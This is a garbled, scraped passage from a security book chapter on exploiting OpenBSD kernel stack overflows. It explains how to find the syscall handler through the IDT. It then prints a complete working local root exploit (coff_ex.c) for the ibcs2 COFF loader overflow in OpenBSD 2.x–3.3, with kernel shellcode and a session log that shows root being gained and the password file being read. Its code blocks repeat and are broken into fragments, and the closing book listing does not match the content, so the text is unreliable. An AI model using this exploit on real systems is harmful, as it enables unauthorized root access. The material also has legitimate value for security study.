OpenBSD uses the same gate_descriptor structure for trap and system descriptors. Also, system gates are referred to as trap gates in the code.

 sys/arch/i386/machdep.c line 2265 setgate(&idt[128], &IDTVEC(syscall), 0, SDT_SYS386TGT, SEL_UPL, GCODE_SEL);     sys/arch/i386/include/segment.h line 99     struct gate_descriptor {         unsigned gd_looffset:16;        /* gate offset (lsb) */         unsigned gd_selector:16;        /* gate segment selector */         unsigned gd_stkcpy:5;           /* number of stack wds to cpy */         unsigned gd_xx:3;               /* unused */         unsigned gd_type:5;             /* segment type */         unsigned gd_dpl:2;              /* segment descriptor priority level */         unsigned gd_p:1;                /* segment descriptor present */         unsigned gd_hioffset:16;        /* gate offset (msb) */ }     [delete]     line 240 #define SDT_SYS386TGT   15      /* system 386 trap gate */ 

The gate_descriptor 's members, gd_looffset and gd_hioffset , will create the low-level interrupt handler's address. For more information on these various fields, you should consult the architecture manuals at .

The system call interface to request kernel services is implemented through the software-initiated interrupt 0x80 . Armed with this information, start at the address of the low-level syscall interrupt handler and walk through the kernel text. You can now find your way to the high-level syscall handler and finally return to it.

The IDT in OpenBSD is named _idt_region , and slot 0x80 is the system gate descriptor for the system call interrupt. Because every member of the IDT is 8 bytes, the system call system gate_descriptor is at address _idt_region + 0x80 * 0x8 , which is _idt_region + 0x400 .

 bash-2.05b# Stopped at          _Debugger+0x4: leave ddb> x/x _idt_region+0x400 _idt_region+0x400:      80e4c ddb> ^M _idt_region+0x404:      e010ef00 

To deduce the initial syscall handler we need to do the proper shift and or operations on the system gate descriptor's bit fields. This will lead us to the 0xe0100e4c kernel address.

 bash-2.05b# Stopped at          _Debugger+0x4: leave ddb> x/x 0xe0100e4c _Xosyscall_end: pushl 
 bash-2.05b# Stopped at _Debugger+0x4: leave ddb> x/x 0xe0100e4c _Xosyscall_end: pushl $0x2 ddb> ^M _Xosyscall_end+0x2: pushl $0x3 ... ... _Xosyscall_end+0x20: call _syscall ... 
x2 ddb> ^M _Xosyscall_end+0x2: pushl
 bash-2.05b# Stopped at _Debugger+0x4: leave ddb> x/x 0xe0100e4c _Xosyscall_end: pushl $0x2 ddb> ^M _Xosyscall_end+0x2: pushl $0x3 ... ... _Xosyscall_end+0x20: call _syscall ... 
x3 ... ... _Xosyscall_end+0x20: call _syscall ...

As with the exception or software-initiated interrupt, the corresponding vector is found in the IDT. The execution is redirected to the handler gathered from one of the gate descriptors. This handler is known as an intermediate handler , which will eventually take us to a real handler. As seen in the kernel debugger output, the initial handler _Xosyscall_end saves all registers (also some other low-level operations) and immediately calls the real handler, _syscall().

We have mentioned that the idtr register always contains the address of the_idt_region . We now need a method of accessing its contents.

 sidt 0x4(%edi) mov  0x6(%edi),%ebx 

The address of the _idt_region is moved to ebx; now IDT can be referenced via ebx . The assembly code to gather the syscall handler from the initial handler is as follows.

 sidt 0x4(%edi) mov  0x6(%edi),%ebx     # mov _idt_region is in ebx mov  0x400(%ebx),%edx   # _idt_region[0x80 * (2*sizeof long) = 0x400] mov  0x404(%ebx),%ecx   # _idt_region[0x404] shr 
 sidt 0x4(%edi) mov 0x6(%edi),%ebx # mov _idt_region is in ebx mov 0x400(%ebx),%edx # _idt_region[0x80 * (2*sizeof long) = 0x400] mov 0x404(%ebx),%ecx # _idt_region[0x404] shr $0x10,%ecx # sal $0x10,%ecx # ecx = gd_hioffset sal $0x10,%edx # shr $0x10,%edx # edx = gd_looffset or %ecx,%edx # edx = ecx  edx = _Xosyscall_end 
x10,%ecx # sal
 sidt 0x4(%edi) mov 0x6(%edi),%ebx # mov _idt_region is in ebx mov 0x400(%ebx),%edx # _idt_region[0x80 * (2*sizeof long) = 0x400] mov 0x404(%ebx),%ecx # _idt_region[0x404] shr $0x10,%ecx # sal $0x10,%ecx # ecx = gd_hioffset sal $0x10,%edx # shr $0x10,%edx # edx = gd_looffset or %ecx,%edx # edx = ecx  edx = _Xosyscall_end 
x10,%ecx # ecx = gd_hioffset sal
 sidt 0x4(%edi) mov 0x6(%edi),%ebx # mov _idt_region is in ebx mov 0x400(%ebx),%edx # _idt_region[0x80 * (2*sizeof long) = 0x400] mov 0x404(%ebx),%ecx # _idt_region[0x404] shr $0x10,%ecx # sal $0x10,%ecx # ecx = gd_hioffset sal $0x10,%edx # shr $0x10,%edx # edx = gd_looffset or %ecx,%edx # edx = ecx  edx = _Xosyscall_end 
x10,%edx # shr
 sidt 0x4(%edi) mov 0x6(%edi),%ebx # mov _idt_region is in ebx mov 0x400(%ebx),%edx # _idt_region[0x80 * (2*sizeof long) = 0x400] mov 0x404(%ebx),%ecx # _idt_region[0x404] shr $0x10,%ecx # sal $0x10,%ecx # ecx = gd_hioffset sal $0x10,%edx # shr $0x10,%edx # edx = gd_looffset or %ecx,%edx # edx = ecx  edx = _Xosyscall_end 
x10,%edx # edx = gd_looffset or %ecx,%edx # edx = ecx edx = _Xosyscall_end

At this stage, we have successfully found the initial/intermediate handler's location. The next logical step is to search through the kernel text, find call_syscall , and gather the displacement of the call instructions and add it to the address of the instruction's location. Additionally, the value of 5 bytes should be added to the displacement to compensate for the size of the call instruction itself.

 xor  %ecx,%ecx          # zero out the counter up: inc  %ecx movb (%edx,%ecx),%bl    # bl =  _Xosyscall_end++ cmpb 
 xor %ecx,%ecx # zero out the counter up: inc %ecx movb (%edx,%ecx),%bl # bl = _Xosyscall_end++ cmpb $0xe8,%bl # if bl == 0xe8 : 'call' jne up lea (%edx,%ecx),%ebx # _Xosyscall_end+%ecx: call _syscall inc %ecx mov (%edx,%ecx),%ecx # take the displacement of the call ins. add $0x5,%ecx # add 5 to displacement add %ebx,%ecx # ecx = _Xosyscall_end+0x20 + disp = _syscall() 
xe8,%bl # if bl == 0xe8 : 'call' jne up lea (%edx,%ecx),%ebx # _Xosyscall_end+%ecx: call _syscall inc %ecx mov (%edx,%ecx),%ecx # take the displacement of the call ins. add
 xor %ecx,%ecx # zero out the counter up: inc %ecx movb (%edx,%ecx),%bl # bl = _Xosyscall_end++ cmpb $0xe8,%bl # if bl == 0xe8 : 'call' jne up lea (%edx,%ecx),%ebx # _Xosyscall_end+%ecx: call _syscall inc %ecx mov (%edx,%ecx),%ecx # take the displacement of the call ins. add $0x5,%ecx # add 5 to displacement add %ebx,%ecx # ecx = _Xosyscall_end+0x20 + disp = _syscall() 
x5,%ecx # add 5 to displacement add %ebx,%ecx # ecx = _Xosyscall_end+0x20 + disp = _syscall()

Now, %ecx holds the address of the real handler, _syscall() . The next step is to find out where to return inside the syscall() function; this will eventually lead to broader research on various versions of OpenBSD with different kernel compilation options. Luckily, it turns out that we can safely search for the call *%eax instruction inside the _syscall() . This proves to be the instruction that dispatches every system call to its final handler in every OpenBSD version tested .

For OpenBSD 2.6 through 3.3, kernel code has always dispatched the system calls with the call *%eax instruction, which is unique in the scope of the _syscall() function.

 bash-2.05b# Stopped at          _Debugger+0x4: leave ddb> x/i _syscall+0x240 _syscall+0x240: call    *%eax ddb>cont 

Our goal is now to figure out the offset ( 0x240 in this case) for any given OS revision. We want to return to the instruction just after the call *%eax from our payload and resume kernel execution. The search code is as follows.

 #search for opcode: ffd0 ie: call *%eax mov    %ecx,%edi mule: mov 
 #search for opcode: ffd0 ie: call *%eax mov %ecx,%edi mule: mov $0xff,%al cld mov $0xffffffff,%ecx repnz scas %es:(%edi),%al # ok, start with searching 0xff mov (%edi),%bl cmp $0xd0,%bl # check if 0xff is followed by 0xd0 jne mule # if not start over inc %edi # good found! xor %eax,%eax #set up return value push %edi #push address on stack ret #jump to found address 
xff,%al cld mov
 #search for opcode: ffd0 ie: call *%eax mov %ecx,%edi mule: mov $0xff,%al cld mov $0xffffffff,%ecx repnz scas %es:(%edi),%al # ok, start with searching 0xff mov (%edi),%bl cmp $0xd0,%bl # check if 0xff is followed by 0xd0 jne mule # if not start over inc %edi # good found! xor %eax,%eax #set up return value push %edi #push address on stack ret #jump to found address 
xffffffff,%ecx repnz scas %es:(%edi),%al # ok, start with searching 0xff mov (%edi),%bl cmp
 #search for opcode: ffd0 ie: call *%eax mov %ecx,%edi mule: mov $0xff,%al cld mov $0xffffffff,%ecx repnz scas %es:(%edi),%al # ok, start with searching 0xff mov (%edi),%bl cmp $0xd0,%bl # check if 0xff is followed by 0xd0 jne mule # if not start over inc %edi # good found! xor %eax,%eax #set up return value push %edi #push address on stack ret #jump to found address 
xd0,%bl # check if 0xff is followed by 0xd0 jne mule # if not start over inc %edi # good found! xor %eax,%eax #set up return value push %edi #push address on stack ret #jump to found address

Finally, this payload is all we need for a clean return. It can be used for any system call based overflow without requiring any further modification.

 - %ebp fixup 

If we used the sidt technique to resume execution, we also need to fix the smashed saved frame pointer in order to prevent a crash while inside the syscall function. You can calculate a meaningful base pointer by setting a breakpoint on the vulnerable function's prolog as well as another breakpoint before the leave instruction in the epilog. Now, calculate the difference between the %ebp recorded at the prolog and the %esp recorded just before the returning to the caller. The following instruction will set the %ebp for this specific vulnerability back to a sane value.

 lea  0x68(%esp),%ebp # fixup ebp 

Getting root (uid=0)

Finally, we link all the previous sections and reach the final exploit code that will elevate privileges to root and break any possible chroot jail.

 -bash-2.05b$ uname -a OpenBSD 3.3 GENERIC#44 i386 -bash-2.05b$ gcc -o the0therat coff_ex.c -bash-2.05b$ id uid=1000(noir) gid=1000(noir) groups=1000(noir) -bash-2.05b$ ./the0therat      DO NOT FORGET TO SHRED ./ibcs2own Abort trap -bash-2.05b$ id uid=0(root) gid=1000(noir) groups=1000(noir) -bash-2.05b$ bash bash-2.05b# cp /dev/zero ./ibcs2own      /home: write failed, file system is full cp: ./ibcs2own: No space left on device bash-2.05b# rm -f ./ibcs2own  bash-2.05b# head -2 /etc/master.passwd  root:a$ [cut] :0:0:daemon:0:0:Charlie &:/root:/bin/csh daemon:*:1:1::0:0:The devil himself:/root:/sbin/nologin ...     ----------------------------- coff_ex.c --------------------------------------     /** OpenBSD 2.x - 3.3                                            **/ /** exec_ibcs2_coff_prep_zmagic() kernel stack overflow          **/  /** note: ibcs2 binary compatibility with SCO and ISC is enabled **/ /** in the default install                                       **/     /**     Copyright Feb 26 2003 Sinan "noir" Eren                  **/  /**                    **/     #include <stdio.h> #include <sys/types.h> #include <fcntl.h> #include <unistd.h> #include <sys/param.h> #include <sys/sysctl.h> #include <sys/signal.h>     /* kernel_sc.s shellcode */     unsigned char shellcode[] = "\xe8\x0f\x00\x00\x00\x78\x56\x34\x12\xfe\xca\xad\xde\xad\xde\xef\xbe" "\x90\x90\x90\x5f\x8b\x0f\x8b\x59\x10\x31\xc0\x89\x43\x04\x8b\x13\x89" "\x42\x04\x8b\x51\x14\x89\x42\x0c\x8d\x6c\x24\x68\x0f\x01\x4f\x04\x8b" "\x5f\x06\x8b\x93\x00\x04\x00\x00\x8b\x8b\x04\x04\x00\x00\xc1\xe9\x10" "\xc1\xe1\x10\xc1\xe2\x10\xc1\xea\x10\x09\xca\x31\xc9\x41\x8a\x1c\x0a" "\x80\xfb\xe8\x75\xf7\x8d\x1c\x0a\x41\x8b\x0c\x0a\x83\xc1\x05\x01\xd9" "\x89\xcf\xb0\xff\xfc\xb9\xff\xff\xff\xff\xf2\xae\x8a\x1f\x80\xfb\xd0" "\x75\xef\x47\x31\xc0\x57\xc3";     /* iret_sc.s */     unsigned char iret_shellcode[] = "\xe8\x0f\x00\x00\x00\x78\x56\x34\x12\xfe\xca\xad\xde\xad\xde\xef\xbe" "\x90\x90\x90\x5f\x8b\x0f\x8b\x59\x10\x31\xc0\x89\x43\x04\x8b\x13\x89" "\x42\x04\x8b\x51\x14\x89\x42\x0c\xfa\x6a\x1f\x07\x6a\x1f\x1f\x6a\x00" "\x5f\x6a\x00\x5e\x68\x00\xd0\xbf\xdf\x5d\x6a\x00\x5b\x6a\x00\x5a\x6a" "\x00\x59\x6a\x00\x58\x6a\x1f\x68\x00\xd0\xbf\xdf\x68\x87\x02\x00\x00" "\x6a\x17";     unsigned char pusheip[] = "\x68\x00\x00\x00\x00"; /* fill eip */     unsigned char iret[] = "\xcf";     unsigned char exitsh[] = "\x31\xc0\xcd\x80\xcc"; /* xorl %eax,%eax, int 
 -bash-2.05b$ uname -a OpenBSD 3.3 GENERIC#44 i386 -bash-2.05b$ gcc -o the0therat coff_ex.c -bash-2.05b$ id uid=1000(noir) gid=1000(noir) groups=1000(noir) -bash-2.05b$ ./the0therat DO NOT FORGET TO SHRED ./ibcs2own Abort trap -bash-2.05b$ id uid=0(root) gid=1000(noir) groups=1000(noir) -bash-2.05b$ bash bash-2.05b# cp /dev/zero ./ibcs2own /home: write failed, file system is full cp: ./ibcs2own: No space left on device bash-2.05b# rm -f ./ibcs2own bash-2.05b# head -2 /etc/master.passwd root:$2a$08$ [cut] :0:0:daemon:0:0:Charlie &:/root:/bin/csh daemon:*:1:1::0:0:The devil himself:/root:/sbin/ nologin ... ----------------------------- coff_ex.c -------------------------------------- /** OpenBSD 2.x - 3.3 **/ /** exec_ibcs2_coff_prep_zmagic() kernel stack overflow **/ /** note: ibcs2 binary compatibility with SCO and ISC is enabled **/ /** in the default install **/ /** Copyright Feb 26 2003 Sinan "noir" Eren **/ /** **/ #include <stdio.h> #include <sys/types.h> #include <fcntl.h> #include <unistd.h> #include <sys/param.h> #include <sys/sysctl.h> #include <sys/signal.h> /* kernel_sc.s shellcode */ unsigned char shellcode[] = "\xe8\x0f\x00\x00\x00\x78\x56\x34\x12\xfe\xca\xad\xde\xad\xde\xef\xbe" "\x90\x90\x90\x5f\x8b\x0f\x8b\x59\x10\x31\xc0\x89\x43\x04\x8b\x13\x89" "\x42\x04\x8b\x51\x14\x89\x42\x0c\x8d\x6c\x24\x68\x0f\x01\x4f\x04\x8b" "\x5f\x06\x8b\x93\x00\x04\x00\x00\x8b\x8b\x04\x04\x00\x00\xc1\xe9\x10" "\xc1\xe1\x10\xc1\xe2\x10\xc1\xea\x10\x09\xca\x31\xc9\x41\x8a\x1c\x0a" "\x80\xfb\xe8\x75\xf7\x8d\x1c\x0a\x41\x8b\x0c\x0a\x83\xc1\x05\x01\xd9" "\x89\xcf\xb0\xff\xfc\xb9\xff\xff\xff\xff\xf2\xae\x8a\x1f\x80\xfb\xd0" "\x75\xef\x47\x31\xc0\x57\xc3"; /* iret_sc.s */ unsigned char iret_shellcode[] = "\xe8\x0f\x00\x00\x00\x78\x56\x34\x12\xfe\xca\xad\xde\xad\xde\xef\xbe" "\x90\x90\x90\x5f\x8b\x0f\x8b\x59\x10\x31\xc0\x89\x43\x04\x8b\x13\x89" "\x42\x04\x8b\x51\x14\x89\x42\x0c\xfa\x6a\x1f\x07\x6a\x1f\x1f\x6a\x00" "\x5f\x6a\x00\x5e\x68\x00\xd0\xbf\xdf\x5d\x6a\x00\x5b\x6a\x00\x5a\x6a" "\x00\x59\x6a\x00\x58\x6a\x1f\x68\x00\xd0\xbf\xdf\x68\x87\x02\x00\x00" "\x6a\x17"; unsigned char pusheip[] = "\x68\x00\x00\x00\x00"; /* fill eip */ unsigned char iret[] = "\xcf"; unsigned char exitsh[] = "\x31\xc0\xcd\x80\xcc"; /* xorl %eax,%eax, int $0x80, int3 */ #define ZERO(p) memset(&p, 0x00, sizeof(p)) /* * COFF file header */ struct coff_filehdr { u_short f_magic; /* magic number */ u_short f_nscns; /* # of sections */ long f_timdat; /* timestamp */ long f_symptr; /* file offset of symbol table */ long f_nsyms; /* # of symbol table entries */ u_short f_opthdr; /* size of optional header */ u_short f_flags; /* flags */ }; /* f_magic flags */ #define COFF_MAGIC_I386 0x14c /* f_flags */ #define COFF_F_RELFLG 0x1 #define COFF_F_EXEC 0x2 #define COFF_F_LNNO 0x4 #define COFF_F_LSYMS 0x8 #define COFF_F_SWABD 0x40 #define COFF_F_AR16WR 0x80 #define COFF_F_AR32WR 0x100 /* * COFF system header */ struct coff_aouthdr { short a_magic; short a_vstamp; long a_tsize; long a_dsize; long a_bsize; long a_entry; long a_tstart; long a_dstart; }; /* magic */ #define COFF_ZMAGIC 0413 /* * COFF section header */ struct coff_scnhdr { char s_name[8]; long s_paddr; long s_vaddr; long s_size; long s_scnptr; long s_relptr; long s_lnnoptr; u_short s_nreloc; u_short s_nlnno; long s_flags; }; /* s_flags */ #define COFF_STYP_TEXT 0x20 #define COFF_STYP_DATA 0x40 #define COFF_STYP_SHLIB 0x800 void get_proc(pid_t, struct kinfo_proc *); void sig_handler(); int main(int argc, char **argv) { u_int i, fd, debug = 0; u_char *ptr, *shptr; u_long *lptr; u_long pprocadr, offset; struct kinfo_proc kp; char *args[] = { "./ibcs2own", NULL}; char *envs[] = { "RIP=theo", NULL}; //COFF structures struct coff_filehdr fhdr; struct coff_aouthdr ahdr; struct coff_scnhdr scn0, scn1, scn2; if(argv[1]) { if(!strncmp(argv[1], "-v", 2)) debug = 1; else { printf("-v: verbose flag only\n"); exit(0); } } ZERO(fhdr); fhdr.f_magic = COFF_MAGIC_I386; fhdr.f_nscns = 3; //TEXT, DATA, SHLIB fhdr.f_timdat = 0xdeadbeef; fhdr.f_symptr = 0x4000; fhdr.f_nsyms = 1; fhdr.f_opthdr = sizeof(ahdr); //AOUT opt header size fhdr.f_flags = COFF_F_EXEC; ZERO(ahdr); ahdr.a_magic = COFF_ZMAGIC; ahdr.a_tsize = 0; ahdr.a_dsize = 0; ahdr.a_bsize = 0; ahdr.a_entry = 0x10000; ahdr.a_tstart = 0; ahdr.a_dstart = 0; ZERO(scn0); memcpy(&scn0.s_name, ".text", 5); scn0.s_paddr = 0x10000; scn0.s_vaddr = 0x10000; scn0.s_size = 4096; scn0.s_scnptr = sizeof(fhdr) + sizeof(ahdr) + (sizeof(scn0)*3); //file offset of .text segment scn0.s_relptr = 0; scn0.s_lnnoptr = 0; scn0.s_nreloc = 0; scn0.s_nlnno = 0; scn0.s_flags = COFF_STYP_TEXT; ZERO(scn1); memcpy(&scn1.s_name, ".data", 5); scn1.s_paddr = 0x10000 - 4096; scn1.s_vaddr = 0x10000 - 4096; scn1.s_size = 4096; scn1.s_scnptr = sizeof(fhdr) + sizeof(ahdr) + (sizeof(scn0)*3) + 4096; //file offset of .data segment scn1.s_relptr = 0; scn1.s_lnnoptr = 0; scn1.s_nreloc = 0; scn1.s_nlnno = 0; scn1.s_flags = COFF_STYP_DATA; ZERO(scn2); memcpy(&scn2.s_name, ".shlib", 6); scn2.s_paddr = 0; scn2.s_vaddr = 0; scn2.s_size = 0xb0; //HERE IS DA OVF!!! static_buffer = 128 scn2.s_scnptr = sizeof(fhdr) + sizeof(ahdr) + (sizeof(scn0)*3) + 2*4096; //file offset of .data segment scn2.s_relptr = 0; scn2.s_lnnoptr = 0; scn2.s_nreloc = 0; scn2.s_nlnno = 0; scn2.s_flags = COFF_STYP_SHLIB; offset = sizeof(fhdr) + sizeof(ahdr) + (sizeof(scn0)*3) + 3*4096; ptr = (char *) malloc(offset); if(!ptr) { perror("malloc"); exit(-1); } memset(ptr, 0xcc, offset); /* fill int3 */ /* copy sections */ offset = 0; memcpy(ptr, (char *) &fhdr, sizeof(fhdr)); offset += sizeof(fhdr); memcpy(ptr+offset, (char *) &ahdr, sizeof(ahdr)); offset += sizeof(ahdr); memcpy(ptr+offset, (char *) &scn0, sizeof(scn0)); offset += sizeof(scn0); memcpy(ptr+offset, &scn1, sizeof(scn1)); offset += sizeof(scn1); memcpy(ptr+offset, (char *) &scn2, sizeof(scn2)); offset += sizeof(scn2); lptr = (u_long *) ((char *)ptr + sizeof(fhdr) + sizeof(ahdr) + \ (sizeof(scn0) * 3) + 4096 + 4096 + 0xb0 - 8); shptr = (char *) malloc(4096); if(!shptr) { perror("malloc"); exit(-1); } if(debug) printf("payload adr: 0x%.8x\t", shptr); memset(shptr, 0xcc, 4096); get_proc((pid_t) getppid(), &kp); pprocadr = (u_long) kp.kp_eproc.e_paddr; if(debug) printf("parent proc adr: 0x%.8x\n", pprocadr); *lptr++ = 0xdeadbeef; *lptr = (u_long) shptr; shellcode[5] = pprocadr & 0xff; shellcode[6] = (pprocadr >> 8) & 0xff; shellcode[7] = (pprocadr >> 16) & 0xff; shellcode[8] = (pprocadr >> 24) & 0xff; memcpy(shptr, shellcode, sizeof(shellcode)-1); unlink("./ibcs2own"); if((fd = open("./ibcs2own", O_CREAT^O_RDWR, 0755)) < 0) { perror("open"); exit(-1); } write(fd, ptr, sizeof(fhdr) + sizeof(ahdr) + (sizeof(scn0) * 3) + 4096*3); close(fd); free(ptr); signal(SIGSEGV, (void (*)())sig_handler); signal(SIGILL, (void (*)())sig_handler); signal(SIGSYS, (void (*)())sig_handler); signal(SIGBUS, (void (*)())sig_handler); signal(SIGABRT, (void (*)())sig_handler); signal(SIGTRAP, (void (*)())sig_handler); printf("\nDO NOT FORGET TO SHRED ./ibcs2own\n"); execve(args[0], args, envs); perror("execve"); } void sig_handler() { _exit(0); } void get_proc(pid_t pid, struct kinfo_proc *kp) { u_int arr[4], len; arr[0] = CTL_KERN; arr[1] = KERN_PROC; arr[2] = KERN_PROC_PID; arr[3] = pid; len = sizeof(struct kinfo_proc); if(sysctl(arr, 4, kp, &len, NULL, 0) < 0) { perror("sysctl"); fprintf(stderr, "this is an unexpected error, rerun!\n"); exit(-1); } } 
x80, int3 */ #define ZERO(p) memset(&p, 0x00, sizeof(p)) /* * COFF file header */ struct coff_filehdr { u_short f_magic; /* magic number */ u_short f_nscns; /* # of sections */ long f_timdat; /* timestamp */ long f_symptr; /* file offset of symbol table */ long f_nsyms; /* # of symbol table entries */ u_short f_opthdr; /* size of optional header */ u_short f_flags; /* flags */ }; /* f_magic flags */ #define COFF_MAGIC_I386 0x14c /* f_flags */ #define COFF_F_RELFLG 0x1 #define COFF_F_EXEC 0x2 #define COFF_F_LNNO 0x4 #define COFF_F_LSYMS 0x8 #define COFF_F_SWABD 0x40 #define COFF_F_AR16WR 0x80 #define COFF_F_AR32WR 0x100 /* * COFF system header */ struct coff_aouthdr { short a_magic; short a_vstamp; long a_tsize; long a_dsize; long a_bsize; long a_entry; long a_tstart; long a_dstart; }; /* magic */ #define COFF_ZMAGIC 0413 /* * COFF section header */ struct coff_scnhdr { char s_name[8]; long s_paddr; long s_vaddr; long s_size; long s_scnptr; long s_relptr; long s_lnnoptr; u_short s_nreloc; u_short s_nlnno; long s_flags; }; /* s_flags */ #define COFF_STYP_TEXT 0x20 #define COFF_STYP_DATA 0x40 #define COFF_STYP_SHLIB 0x800 void get_proc(pid_t, struct kinfo_proc *); void sig_handler(); int main(int argc, char **argv) { u_int i, fd, debug = 0; u_char *ptr, *shptr; u_long *lptr; u_long pprocadr, offset; struct kinfo_proc kp; char *args[] = { "./ibcs2own", NULL}; char *envs[] = { "RIP=theo", NULL}; //COFF structures struct coff_filehdr fhdr; struct coff_aouthdr ahdr; struct coff_scnhdr scn0, scn1, scn2; if(argv[1]) { if(!strncmp(argv[1], "-v", 2)) debug = 1; else { printf("-v: verbose flag only\n"); exit(0); } } ZERO(fhdr); fhdr.f_magic = COFF_MAGIC_I386; fhdr.f_nscns = 3; //TEXT, DATA, SHLIB fhdr.f_timdat = 0xdeadbeef; fhdr.f_symptr = 0x4000; fhdr.f_nsyms = 1; fhdr.f_opthdr = sizeof(ahdr); //AOUT opt header size fhdr.f_flags = COFF_F_EXEC; ZERO(ahdr); ahdr.a_magic = COFF_ZMAGIC; ahdr.a_tsize = 0; ahdr.a_dsize = 0; ahdr.a_bsize = 0; ahdr.a_entry = 0x10000; ahdr.a_tstart = 0; ahdr.a_dstart = 0; ZERO(scn0); memcpy(&scn0.s_name, ".text", 5); scn0.s_paddr = 0x10000; scn0.s_vaddr = 0x10000; scn0.s_size = 4096; scn0.s_scnptr = sizeof(fhdr) + sizeof(ahdr) + (sizeof(scn0)*3); //file offset of .text segment scn0.s_relptr = 0; scn0.s_lnnoptr = 0; scn0.s_nreloc = 0; scn0.s_nlnno = 0; scn0.s_flags = COFF_STYP_TEXT; ZERO(scn1); memcpy(&scn1.s_name, ".data", 5); scn1.s_paddr = 0x10000 - 4096; scn1.s_vaddr = 0x10000 - 4096; scn1.s_size = 4096; scn1.s_scnptr = sizeof(fhdr) + sizeof(ahdr) + (sizeof(scn0)*3) + 4096; //file offset of .data segment scn1.s_relptr = 0; scn1.s_lnnoptr = 0; scn1.s_nreloc = 0; scn1.s_nlnno = 0; scn1.s_flags = COFF_STYP_DATA; ZERO(scn2); memcpy(&scn2.s_name, ".shlib", 6); scn2.s_paddr = 0; scn2.s_vaddr = 0; scn2.s_size = 0xb0; //HERE IS DA OVF!!! static_buffer = 128 scn2.s_scnptr = sizeof(fhdr) + sizeof(ahdr) + (sizeof(scn0)*3) + 2*4096; //file offset of .data segment scn2.s_relptr = 0; scn2.s_lnnoptr = 0; scn2.s_nreloc = 0; scn2.s_nlnno = 0; scn2.s_flags = COFF_STYP_SHLIB; offset = sizeof(fhdr) + sizeof(ahdr) + (sizeof(scn0)*3) + 3*4096; ptr = (char *) malloc(offset); if(!ptr) { perror("malloc"); exit(-1); } memset(ptr, 0xcc, offset); /* fill int3 */ /* copy sections */ offset = 0; memcpy(ptr, (char *) &fhdr, sizeof(fhdr)); offset += sizeof(fhdr); memcpy(ptr+offset, (char *) &ahdr, sizeof(ahdr)); offset += sizeof(ahdr); memcpy(ptr+offset, (char *) &scn0, sizeof(scn0)); offset += sizeof(scn0); memcpy(ptr+offset, &scn1, sizeof(scn1)); offset += sizeof(scn1); memcpy(ptr+offset, (char *) &scn2, sizeof(scn2)); offset += sizeof(scn2); lptr = (u_long *) ((char *)ptr + sizeof(fhdr) + sizeof(ahdr) + \ (sizeof(scn0) * 3) + 4096 + 4096 + 0xb0 - 8); shptr = (char *) malloc(4096); if(!shptr) { perror("malloc"); exit(-1); } if(debug) printf("payload adr: 0x%.8x\t", shptr); memset(shptr, 0xcc, 4096); get_proc((pid_t) getppid(), &kp); pprocadr = (u_long) kp.kp_eproc.e_paddr; if(debug) printf("parent proc adr: 0x%.8x\n", pprocadr); *lptr++ = 0xdeadbeef; *lptr = (u_long) shptr; shellcode[5] = pprocadr & 0xff; shellcode[6] = (pprocadr >> 8) & 0xff; shellcode[7] = (pprocadr >> 16) & 0xff; shellcode[8] = (pprocadr >> 24) & 0xff; memcpy(shptr, shellcode, sizeof(shellcode)-1); unlink("./ibcs2own"); if((fd = open("./ibcs2own", O_CREAT^O_RDWR, 0755)) < 0) { perror("open"); exit(-1); } write(fd, ptr, sizeof(fhdr) + sizeof(ahdr) + (sizeof(scn0) * 3) + 4096*3); close(fd); free(ptr); signal(SIGSEGV, (void (*)())sig_handler); signal(SIGILL, (void (*)())sig_handler); signal(SIGSYS, (void (*)())sig_handler); signal(SIGBUS, (void (*)())sig_handler); signal(SIGABRT, (void (*)())sig_handler); signal(SIGTRAP, (void (*)())sig_handler); printf("\nDO NOT FORGET TO SHRED ./ibcs2own\n"); execve(args[0], args, envs); perror("execve"); } void sig_handler() { _exit(0); } void get_proc(pid_t pid, struct kinfo_proc *kp) { u_int arr[4], len; arr[0] = CTL_KERN; arr[1] = KERN_PROC; arr[2] = KERN_PROC_PID; arr[3] = pid; len = sizeof(struct kinfo_proc); if(sysctl(arr, 4, kp, &len, NULL, 0) < 0) { perror("sysctl"); fprintf(stderr, "this is an unexpected error, rerun!\n"); exit(-1); } }

The Shellcoder's Handbook. Discovering and Exploiting Security
Hacking Ubuntu: Serious Hacks Mods and Customizations (ExtremeTech)
EAN: 2147483647
Year: 2003
Pages: 198
Authors: Neal Krawetz
BUY ON AMAZON © 2008-2017.
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